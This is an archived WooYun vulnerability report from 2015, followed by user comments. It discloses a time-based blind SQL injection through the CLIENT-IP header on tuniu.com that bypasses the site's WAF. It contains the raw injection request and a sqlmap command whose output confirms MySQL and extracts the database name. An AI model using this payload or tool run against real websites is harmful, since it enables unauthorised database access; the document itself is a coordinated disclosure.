途牛旅游网主站SQL时间盲注+无视WAF

编号122321
Urlhttp://www.wooyun.org/bug.php?action=view&id=122321
漏洞状态厂商已经确认
漏洞标题途牛旅游网主站SQL时间盲注+无视WAF
漏洞类型SQL注射漏洞
厂商途牛旅游网
白帽子Jannock
提交日期2015-06-23 17:29:00
公开日期2015-08-07 17:54:00
修复时间(not set)
确认时间2015-06-23 00:00:00
Confirm Spend0
漏洞标签php+字符类型注射
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank20
漏洞简介
途牛旅游网主站SQL时间盲注+无视WAF。
PS:waf越做越变态了。
漏洞细节

GET /Partner_redirect.php HTTP/1.1
Host: www.tuniu.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
CLIENT-IP: 127.0.0.1'+if((1=1 * ),(select 1 from information_schema.tables),(select 1 from information_schema.tables))+'
Content-Length: 0
Connection: close

POC

python sqlmap.py -r 1.txt --dbms=mysql --technique=T
--current-db
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 17:18:43
[17:18:43] [INFO] parsing HTTP request from '1.txt'
custom injection marking character ('*') found in option '--headers/--user-agent
/--referer/--cookie'. Do you want to process it? [Y/n/q] y
[17:18:44] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://www.tuniu.com'. Do you want to follow? [Y/n
] n
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: (custom) HEADER
Parameter: CLIENT-IP #1*
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: 127.0.0.1'+if((1=1 ) AND SLEEP(5) AND (4256=4256 ),(select 1 from i
nformation_schema.tables),(select 1 from information_schema.tables))+'
---
[17:18:50] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[17:19:03] [INFO] confirming MySQL
[17:19:03] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
[17:19:13] [INFO] adjusting time delay to 1 second due to good response times
[17:19:13] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[17:19:13] [INFO] fetching current database
[17:19:13] [INFO] retrieved: tuniu
current database: 'tuniu'


1.png

修复方案

过滤

状态信息 2015-06-23: 细节已通知厂商并且等待厂商处理中
2015-06-23: 厂商已经确认,细节仅向厂商公开
2015-07-03: 细节向核心白帽子及相关领域专家公开
2015-07-13: 细节向普通白帽子公开
2015-07-23: 细节向实习白帽子公开
2015-08-07: 细节向公众公开
厂商回复谢谢一哥关注途牛安全,我们正在紧急修复,啥都不说了。。
回应信息危害等级:高漏洞Rank:20 确认时间:2015-06-23 17:53
Showing 1-20 of 20 items.
评论内容评论人点赞数评论时间

@途牛旅游网 你名字后面大大的(乌云厂商)暴露了你是一个人,精神分裂无疑,。。。一定是厂商发现删不掉回复才。。。@DloveJ

鹤冲天02015-08-07 18:53:00

还不公开给看看啊

D_in02015-07-09 11:35:00

希望没重复

feng02015-06-24 07:36:00

@途牛旅游网 哪来的泼猴 竟敢冒充我

0c0c0f02015-06-23 21:58:00

@途牛旅游网 一定是精神分裂症了

子非海绵宝宝02015-06-23 20:51:00

@途牛旅游网 你们不是一个人么,

DloveJ02015-06-23 20:24:00

@途牛旅游网 哪来的泼猴 竟敢冒充我

Mr.R02015-06-23 20:13:00

@途牛旅游网 哪来的泼猴,竟敢冒充我!

hkAssassin02015-06-23 18:20:00

@途牛旅游网 哪来的泼猴,竟敢冒充我!

途牛旅游网02015-06-23 17:57:00

一哥屌屌的!

qhwlpg02015-06-23 17:54:00

一哥NB

爱上平顶山02015-06-23 17:44:00

一个个补上

scanf02015-06-23 17:41:00

一哥别忘记我,洗好等你哟!(✿◡‿◡)

途牛旅游网02015-06-23 17:37:00

@途牛旅游网 哈哈,节操碎了。

紫霞仙子02015-06-23 17:37:00

只是想不想发的问题

scanf02015-06-23 17:35:00

顶一哥

luwikes02015-06-23 17:35:00

前些日子找一哥光顾的各大厂商,一哥说回头一个一个补上。

梧桐雨02015-06-23 17:35:00

关注,一哥的注入

D_in02015-06-23 17:35:00

一哥NB

浩天02015-06-23 17:31:00

哈哈哈,关注

疯子02015-06-23 17:31:00